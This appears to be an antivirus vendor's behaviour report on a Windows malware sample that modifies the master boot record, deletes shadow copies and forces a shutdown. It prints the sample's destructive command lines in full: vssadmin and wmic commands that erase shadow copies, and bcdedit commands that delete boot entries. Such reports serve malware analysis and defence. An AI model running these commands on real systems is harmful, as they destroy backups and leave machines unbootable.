Technical Information
To ensure autorun and distribution
Modifies master boot record (MBR).
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Modifies file system
Creates the following files
- nul
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet >nul 2>&1
- '<SYSTEM32>\cmd.exe' /c wmic shadowcopy delete >nul 2>&1
- '<SYSTEM32>\cmd.exe' /c bcdedit /delete {current} /f >nul 2>&1
- '<SYSTEM32>\bcdedit.exe' /delete {current} /f
- '<SYSTEM32>\cmd.exe' /c bcdedit /delete {default} /f >nul 2>&1
- '<SYSTEM32>\bcdedit.exe' /delete {default} /f
- '<SYSTEM32>\cmd.exe' /c bcdedit /delete {emssettings} /f >nul 2>&1
- '<SYSTEM32>\bcdedit.exe' /delete {emssettings} /f
- '<SYSTEM32>\cmd.exe' /c bcdedit /delete {dbgsettings} /f >nul 2>&1
- '<SYSTEM32>\bcdedit.exe' /delete {dbgsettings} /f
- '<SYSTEM32>\cmd.exe' /c bcdedit /delete {ntldr} /f >nul 2>&1
- '<SYSTEM32>\bcdedit.exe' /delete {ntldr} /f
Attempts to shut down the Windows operating system.
